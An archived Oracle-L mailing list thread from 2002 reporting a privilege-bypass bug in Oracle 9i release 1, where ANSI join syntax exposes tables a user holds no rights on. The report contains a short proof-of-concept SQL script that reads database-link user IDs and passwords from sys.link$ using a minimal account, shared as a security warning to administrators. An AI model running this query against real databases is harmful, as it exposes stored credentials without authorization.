| Oracle FAQ | Your Portal to the Oracle Knowledge Grid | |
 |
 | |||
| Oracle FAQ | Your Portal to the Oracle Knowledge Grid | |
|
| |||
Home -> Community -> Mailing Lists -> Oracle-L -> Re: Security Hole
There should be an emergency backport available for that fix/problem. If not, who wants to use 9i release 1 ?
Anjo.
Mark Leith wrote:
> "9i - Can't break it, can't break in!" ?!?!? ;0P
>
> -----Original Message-----
> Lewis
> Sent: 16 April 2002 12:33
> To: Multiple recipients of list ORACLE-L
>
> This just in from comp.databases.oracle.server.
>
> See metalink bug 2121935.
>
> Using ANSI syntax joins (CROSS JOIN, LEFT OUTER etc)
> allows you to view data from tables on which you have no
> privilege. For example, try this COMPLETE script:
>
> connect / as sysdba
> create user us1 identified by us1;
> grant create session to us1;
>
> connect us1/us1
>
> select userid, password
> from
> sys.link$ cross join dual
> ;
>
> Worse still, if you have the privilege to create views
> then this loophole allows you to seek and destroy
> ANY DATA in the database that you might want to.
>
> The bug is fixed in 9iR2. I didn't see any note
> about a backport, or a security alert on OTN.
>
> Conclusion:
>
> 9.0.1 should not be in use on production system
> until Oracle supplies a fix.
>
> Jonathan Lewis
> http://www.jlcomp.demon.co.uk
>
> Author of:
> Practical Oracle 8i: Building Efficient Databases
>
> Next Seminar - Australia - July/August
> http://www.jlcomp.demon.co.uk/seminar.html
>
> Host to The Co-Operative Oracle Users' FAQ
> http://www.jlcomp.demon.co.uk/faq/ind_faq.html
>
> --
> Please see the official ORACLE-L FAQ: http://www.orafaq.com
> --
> Author: Jonathan Lewis
> INET: jonathan_at_jlcomp.demon.co.uk
>
> Fat City Network Services -- (858) 538-5051 FAX: (858) 538-5051
> San Diego, California -- Public Internet access / Mailing Lists
> --------------------------------------------------------------------
> To REMOVE yourself from this mailing list, send an E-Mail message
> to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in
> the message BODY, include a line containing: UNSUB ORACLE-L
> (or the name of mailing list you want to be removed from). You may
> also send the HELP command for other information (like subscribing).
> --
> Please see the official ORACLE-L FAQ: http://www.orafaq.com
> --
> Author: Mark Leith
> INET: mark_at_cool-tools.co.uk
>
> Fat City Network Services -- (858) 538-5051 FAX: (858) 538-5051
> San Diego, California -- Public Internet access / Mailing Lists
> --------------------------------------------------------------------
> To REMOVE yourself from this mailing list, send an E-Mail message
> to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in
> the message BODY, include a line containing: UNSUB ORACLE-L
> (or the name of mailing list you want to be removed from). You may
> also send the HELP command for other information (like subscribing).
-- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Anjo Kolk INET: anjo_at_oraperf.com Fat City Network Services -- (858) 538-5051 FAX: (858) 538-5051 San Diego, California -- Public Internet access / Mailing Lists -------------------------------------------------------------------- To REMOVE yourself from this mailing list, send an E-Mail message to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing).Received on Tue Apr 16 2002 - 11:28:32 CDT
 |
 |